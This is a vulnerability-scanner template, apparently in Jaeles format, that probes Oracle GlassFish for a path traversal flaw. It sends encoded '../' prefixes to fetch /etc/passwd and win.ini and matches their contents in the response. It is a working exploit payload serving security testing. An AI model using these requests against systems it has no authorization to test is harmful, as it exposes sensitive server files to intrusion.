id: oracle-glassfish-lfi
info:
  name: Oracle Glassfish Path Traversal
  risk: High
  confidence: Certain

params:
  - root: "{{.BaseURL}}"

variables:
  - prefix: |
      /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae
      /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.prefix}}/etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash")

  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.prefix}}/windows/win.ini
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "[extensions]") && StringSearch("response", "[fonts]")

references:
  - links:
      - https://www.exploit-db.com/exploits/45196